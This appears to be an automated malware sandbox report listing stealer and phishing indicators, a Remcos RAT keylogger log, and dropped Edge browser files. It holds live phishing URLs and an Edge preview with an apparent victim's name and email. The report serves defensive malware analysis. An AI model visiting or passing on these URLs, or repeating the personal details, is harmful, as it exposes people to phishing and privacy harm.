                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        • 20.190.135.7
                                                                                                                                                                                                        • 40.126.29.12
                                                                                                                                                                                                        https://parkonking.us15.list-manage.com/track/click?u=ad047aa5468a45d38c75e108c&id=88101fd354&e=1659a0a55dGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 20.190.135.7
                                                                                                                                                                                                        • 40.126.29.12
                                                                                                                                                                                                        https://daddyztech.com/mah/pub/korea/korea/index.php?email=kdjung3@hdel.co.krGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        • 20.190.135.7
                                                                                                                                                                                                        • 40.126.29.12
                                                                                                                                                                                                        https://anzsupportus.web.app/#Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 20.190.135.7
                                                                                                                                                                                                        • 40.126.29.12
                                                                                                                                                                                                        https://www.google.com/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rqjkphmdlmFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/RTupG#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        • 20.190.135.7
                                                                                                                                                                                                        • 40.126.29.12
                                                                                                                                                                                                        file.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                                                                        • 20.190.135.7
                                                                                                                                                                                                        • 40.126.29.12
                                                                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19Rechnung_10401.jsGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                        • 104.21.13.139
                                                                                                                                                                                                        • 172.67.200.96
                                                                                                                                                                                                        A322mb7u3h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.21.13.139
                                                                                                                                                                                                        • 172.67.200.96
                                                                                                                                                                                                        C6y77dS3l7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.21.13.139
                                                                                                                                                                                                        • 172.67.200.96
                                                                                                                                                                                                        Wiu8X6685m.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.21.13.139
                                                                                                                                                                                                        • 172.67.200.96
                                                                                                                                                                                                        WUa1Tm8Dlv.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.21.13.139
                                                                                                                                                                                                        • 172.67.200.96
                                                                                                                                                                                                        XOr3Kqyo9n.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                        • 104.21.13.139
                                                                                                                                                                                                        • 172.67.200.96
                                                                                                                                                                                                        AcroCEF.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                        • 104.21.13.139
                                                                                                                                                                                                        • 172.67.200.96
                                                                                                                                                                                                        0r9PL33C8E.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                        • 104.21.13.139
                                                                                                                                                                                                        • 172.67.200.96
                                                                                                                                                                                                        Pw2KHOL9Z8.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                        • 104.21.13.139
                                                                                                                                                                                                        • 172.67.200.96
                                                                                                                                                                                                        QkBj8CevLU.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                        • 104.21.13.139
                                                                                                                                                                                                        • 172.67.200.96

                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                        C:\ProgramData\remcos\logs.dat

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):606
                                                                                                                                                                                                        Entropy (8bit):3.4573380361869503
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:6lZQec0WFe5BWnwAMVWItN2LPjKy4tN2X5y4tN2LPeMl:6rtc0WqBWnwBWIt0ey4tMy4t0dl
                                                                                                                                                                                                        MD5:2BB22E75A11921E899FB96FC26050324
                                                                                                                                                                                                        SHA1:43724F9DA209456333BF608ACFC33F180BC7049B
                                                                                                                                                                                                        SHA-256:FF977CB2F4A009A5F4BB9479A00EB840D6F21E25F502C70136C521E48F020B09
                                                                                                                                                                                                        SHA-512:17B80308579DD095661CDA79C76A50B6784250B8F27735206D9DFAD16EC2A2F1F6BA45CCD7030D137FA353E6860AE069A5C9837645D809A26E006A839881A6AB
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                                                                                        Preview:....[.2.0.2.4./.1.1./.1.1. .0.2.:.1.0.:.5.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.N.e.w. .t.a.b. .-. .P.r.o.f.i.l.e. .1. .-. .M.i.c.r.o.s.o.f.t.. .E.d.g.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .7.0.5.9.8. .m.i.n.u.t.e.s. .}.........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .3.0.7.4. .m.i.n.u.t.e.s. .}.........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .7.0.1.4.2. .m.i.n.u.t.e.s. .}.....

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\16f9409f-7dfb-4b62-99e6-db710ea6d88b.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16220
                                                                                                                                                                                                        Entropy (8bit):5.7880850797217
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:Y9iIxuERzA83h09RZxJIPaK8y9b6cZGVKf+qNpuB:DIxuERzA83h09RZxBK8y9b9EKfHNp2
                                                                                                                                                                                                        MD5:D5A0338AA9C7EF2B80106106DF8992F5
                                                                                                                                                                                                        SHA1:F0654AEA0E37BF8478D00DC822EBCB7A84786729
                                                                                                                                                                                                        SHA-256:929336DFBB0EBDE117CC0760BC455A996F7B185E2B59FFB24E8B31DAB7636007
                                                                                                                                                                                                        SHA-512:EEF201A0C823956F6CC33E5743D5E9D1D3E45DA27B1A04BE911AE95837427B16E688243BAD1E5C254DC32AF11A5FEFD61AE7268E53E4479A93717CD37E34A7F8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_polic

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\390c77ec-796b-44aa-bb25-7251f3111933.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14969
                                                                                                                                                                                                        Entropy (8bit):5.625902218243038
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:U9iIuERzA83h09RZxeIKrb8y9eIKf+qNrB:/IuERzA83h09RZxub8y9eIKfHNd
                                                                                                                                                                                                        MD5:7B169E6533A1190C9D60A7D6DC985A4F
                                                                                                                                                                                                        SHA1:FCC541D7DF586A46A6D31E6E08021E58E2A8A710
                                                                                                                                                                                                        SHA-256:C65C4D3896A140BC82CDB49A2E3FB1EBECF2373C53D20F82AD195A52E4C5309E
                                                                                                                                                                                                        SHA-512:33BC784CE3FD81A545F6D5FD4AC2E1388ADE4FFEBD4955086F95026D248D0AEECE7E95A4942D50FF4EC85281B7517B56EC5D3CE8A853F2A5E13EAD94F14727F4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\10d64281-c85b-42a8-bc8b-8640eec7602d.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):107893
                                                                                                                                                                                                        Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                        MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                        SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                        SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                        SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):107893
                                                                                                                                                                                                        Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                        MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                        SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                        SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                        SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6731AE0E-1D10.pma

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                        Entropy (8bit):0.251884157265785
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:f5dhD+2Y3gpjRoxveY5jmVnsQ7AwRG/bRGg1DRqb:f5dhSL3gp5CjmVsQ7A9sg1Y
                                                                                                                                                                                                        MD5:4F5065DAE7045B3300D2C2372216044C
                                                                                                                                                                                                        SHA1:9AEA348AA948E2A0E104B6DF1138826DFA6055F8
                                                                                                                                                                                                        SHA-256:4CC13E357EB790F4A556CC215B2E3852D605E4C08C1BF200B2AF062C0049FF35
                                                                                                                                                                                                        SHA-512:8CD35398D9B3B5375C730439BB139C268B5EA63FAB27CF02B92C52130BB3F36B0B553CDB497988D39074B2C666A0ED4A9C070074FF194CE8871F68A8A7FD8DD4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:...@..@...@.....C.].....@...............@...................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0......C<>.Z...................C<>.Z..................UMA.PersistentHistograms.DriveType......8...i.y.[".................................................i.y..Yd........A...........................7o.I'.Y.".4.............8o.I'.Y.................UMA.PersistentHistograms.HistogramsInStartupFile........ ...i.y.......7o.I'.Y..C<>.... ...i.y.......7o.I'.Y.7o.I........i.y..Yd........A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.........i.y.Pq.3................94.0.992.31-64".en-US*...Windows NT..10.0.1904224..x86_64..|.......".To Be Filled By O.E.M....x86_64:F..variations_seed_etag.."mOB9Fluqaq+mietxhYXSL2cAH0KxdzECs1csHpZVA18="P....5...............4.>.2...:..............0..,.......TelemetryPopSampleSampling......Default..@..<...%...msAutoToggleMSAPrtSSOForNonMSAProfile.......triggere

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):152
                                                                                                                                                                                                        Entropy (8bit):4.846101405296782
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Fg/fltlK7D2yQ9Bu2jVuDgmWUJ62+I3fdlYl8:qf1KryvpMgmTb3f08
                                                                                                                                                                                                        MD5:4F92EE10C14AB76DB7578B74BFD51FBD
                                                                                                                                                                                                        SHA1:A7F3CD6CA3249B0127EBDD3F02894EFCDC71BD8E
                                                                                                                                                                                                        SHA-256:91BAD29873C51B45151A7BDAE3B1233EA55F063C3592F966FBF5492426B6303B
                                                                                                                                                                                                        SHA-512:8DB464088823EAA5A73108453ECFD61F87251EA617D0C62B664EE0AD6288AA86126FEBB50B4AD3F0E126C844EDE01177705384B4B05DE54AB030879CC9342005
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:sdPC....................+.^..h#A...0.ER."mOB9Fluqaq+mietxhYXSL2cAH0KxdzECs1csHpZVA18="..................baf89b04-ec85-4201-8b33-0b186effe467............

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\05f48822-2eae-4be0-af11-e4af3bcce180.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\4e2f5ea5-f342-4545-b418-d223815c012a.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):24087
                                                                                                                                                                                                        Entropy (8bit):5.590112296681691
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:1sfCtaFZKhOObJ+UoAYDCx9TuqZz0VfUCh7xbog/OVaLlg9RCqrU1VvPpIpUOIj7:1eWGZ8F1+UoAYDCx9Tuqh0VfUC9xbogT
                                                                                                                                                                                                        MD5:8D19EAA746333559D93B1F5F2DF3692E
                                                                                                                                                                                                        SHA1:075771A8F706EE4ACFDC38559A9FD8E931FC6D6E
                                                                                                                                                                                                        SHA-256:0BBC927747BA50FD850C8C47BDE5C71685F5CBC4B9CAD7336FE21F3078148206
                                                                                                                                                                                                        SHA-512:97087912B28346934707DD60DF912A18FFDF3AE65BEA1EA2ACDB47A7C1413AD68253AAD96B76D1A7683E17ED5CFF7DFD179C98826AF12F2C4D67E76E964CDAC0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"edge":{"services":{"last_account_id":"","last_username":""}},"extensions":{"settings":{"dgiklkfkllikcanfonkcabmbdfmgleag":{"active_permissions":{"api":[],"manifest_permissions":[]},"commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13375782671206215","location":5,"manifest":{"content_capabilities":{"include_globs":["https://*excel.officeapps.live.com/*","https://*onenote.officeapps.live.com/*","https://*powerpoint.officeapps.live.com/*","https://*word-edit.officeapps.live.com/*","https://*excel.partner.officewebapps.cn/*","https://*onenote.partner.officewebapps.cn/*","https://*powerpoint.partner.officewebapps.cn/*","https://*word-edit.partner.officewebapps.cn/*","https://*excel.gov.online.office365.us/*","https://*onenote.gov.online.office365.us/*","https://*powerpoint.gov.online.office365.us/*","https://*word-edit.gov.online.office365.us/*","https://

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\60343a04-4c08-49bd-b9ed-6258affd0a15.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:MS Windows icon resource - 8 icons, 16x16, 32 bits/pixel, 20x20, 32 bits/pixel
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):71757
                                                                                                                                                                                                        Entropy (8bit):6.771708343960135
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:vAlMWz7vLDtDSVlXXwpFlorgLUxF+D4n6owPFCawP/:vvuWAUxFaoGw/
                                                                                                                                                                                                        MD5:E5E3377341056643B0494B6842C0B544
                                                                                                                                                                                                        SHA1:D53FD8E256EC9D5CEF8EF5387872E544A2DF9108
                                                                                                                                                                                                        SHA-256:E23040951E464B53B84B11C3466BBD4707A009018819F9AD2A79D1B0B309BC25
                                                                                                                                                                                                        SHA-512:83F09E48D009A5CF83FA9AA8F28187F7F4202C84E2D0D6E5806C468F4A24B2478B73077381D2A21C89AA64884DF3C56E8DC94EB4AD2D6A8085AC2FEB1E26C2EF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:............ .h............. ............... ......... .... .........((.... .h....%..00.... ..%..>@..@@.... .(B...e........ .?p......(....... ..... ..........................................w...x...y...v...j...c...\...N...........................w.<.w...y...x...]...P...M...N...N...N...M...H.<.............w.<.w...y...{...]...P...O...Q...R...P...O...N...K...H.<.........w...y...{...p...P...P...Q...S...Q...P..N...N..K...K.......w...y...{...|...i...Q...P...S...R.......................I.W.....y...{...}.......c...Q...Q...U.W......3<..6.i.?.V.D.L.L.@.Q<.....{...}..........n...P...S............3.7...;.f.B.P.P.D.U.8.[W.}................P...P.s..........3...7...<.g.H.c.O.R.Y.?.].................u...J...........6..8...?...E.o.O.U.W.L._..............................$...7...@...J.o.O.b.].L.f..+...........................*...0...;...J...S.h.].X.e.../..0.................!...*...*...2...<...G...P.i.g.Y.m.......1..2..0...0.......+...*...*...1...8...C...M.~.^.m.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\7cd74a1c-4405-4270-8d39-917d70d556ec.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9000
                                                                                                                                                                                                        Entropy (8bit):4.994257462742733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:18XcUTNk9jPcAWMdkxoouYI3+YJuRhFeB/NhK9:2cUTNk9jPcAWMdaooVIS/me9
                                                                                                                                                                                                        MD5:3CB1586353968B52F028A678ED76E36E
                                                                                                                                                                                                        SHA1:CA5D7CF1919B126888AE487BEF587ABA56CFC4C9
                                                                                                                                                                                                        SHA-256:14842C0CB079FF70AC52A3DDEB82275D34E792F24A8CF9E229C3755A7014B382
                                                                                                                                                                                                        SHA-512:DA5462C205157B953A8A2D87430C910B2B09ED2701D2110EA6A9AA0BC8CAC303479B2E09B87B069E1B30B29FFE70565BE544944D0CBF2E3255A80EEDFA30F54A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"account_id_migration_state":2,"account_info":[{"account_id":"000340011677ED77","accountcapabilities":{"can_offer_extended_chrome_sync_promos":-1},"edge_account_age_group":3,"edge_account_cid":"8628dc546dc99469","edge_account_first_name":"Shahak","edge_account_is_test_on_premises_profile":false,"edge_account_last_name":"Shapira","edge_account_location":"CH","edge_account_oid":"","edge_account_sovereignty":0,"edge_account_tenant_id":"","edge_account_type":1,"edge_data_protection_type":0,"edge_is_data_protection_target":false,"edge_wam_aad_for_app_account_type":0,"email":"shahak.shapira@outlook.com","full_name":"","gaia":"000340011677ED77","given_name":"","hd":"","is_supervised_child":-1,"is_under_advanced_protection":false,"last_downloaded_image_url_with_size":"","locale":"","picture_url":""}],"account_tracker_service_last_update":"13335737597040910","alternate_error_pages":{"backup":true},"anaheim_import":{"auto_imported_details":{"imported_time":"Wed Sep 22 11:33:08 2021\n","profiles

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9be02122-7d62-4dd0-887f-e7d1ad0e2f47.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7894
                                                                                                                                                                                                        Entropy (8bit):4.959704904517735
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:s72TNk9jPcAWMdkEDouYI3+YJuRhH9rnhuI:s72TNk9jPcAWMdxDoVISFuI
                                                                                                                                                                                                        MD5:79E7A26B13E79E2690287A22731F3584
                                                                                                                                                                                                        SHA1:F4303F5F2A8245FBD56678E0EB388E4EF3F9F62E
                                                                                                                                                                                                        SHA-256:CA85A60D708526521DBD49F4C0D0E374B4BFD1D74A6BBBBC0882B097EC3FB6F2
                                                                                                                                                                                                        SHA-512:C5BD1F656D8F352AF1F26F3DC4C1E0F6D267557C8CFF0698F2EA484D33EAD264FDA4857D97AF6E90F24E5D417F167B585B2A90590A0339077C9E2AD31F559B41
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_info":[],"account_tracker_service_last_update":"13375782671418792","alternate_error_pages":{"backup":true},"anaheim_import":{"auto_imported_details":{"imported_time":"Wed Sep 22 11:33:08 2021\n","profiles":{"browser_name":6,"is_AutoFillFormData_imported":true,"is_Cookies_imported":true,"is_Extensions_imported":true,"is_Favorite_imported":true,"is_History_imported":true,"is_Payments_imported":true,"is_SavedPasswords_imported":true,"is_Settings_imported":true,"source_path":"C:\\Users\\user\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default"}},"imported_default_search_engine":"https://www.bing.com/search?q={searchTerms}&FORM={referrer:source}"},"autocomplete":{"retention_policy_last_version":94},"autofill":{"orphan_rows_removed":true},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_norm

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 11, database pages 7, 1st free page 5, free pages 2, cookie 0x9, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                                                        Entropy (8bit):1.5266981766347234
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:sn5HGseXijqO6ng5G3gtzT6CAjwD+rTswhA/0jNMpY:s5m1ij5Mgg3c2CbIswu/0jNMpY
                                                                                                                                                                                                        MD5:09217A57548ACACF6C531262D920451F
                                                                                                                                                                                                        SHA1:FEB214AADB48C1BA30E9C2D0EFF8A6E66868054B
                                                                                                                                                                                                        SHA-256:7600BFF6A1381441C06923059C5E84F3A4E4DF5FADFEE4D40D6DD92050E94B84
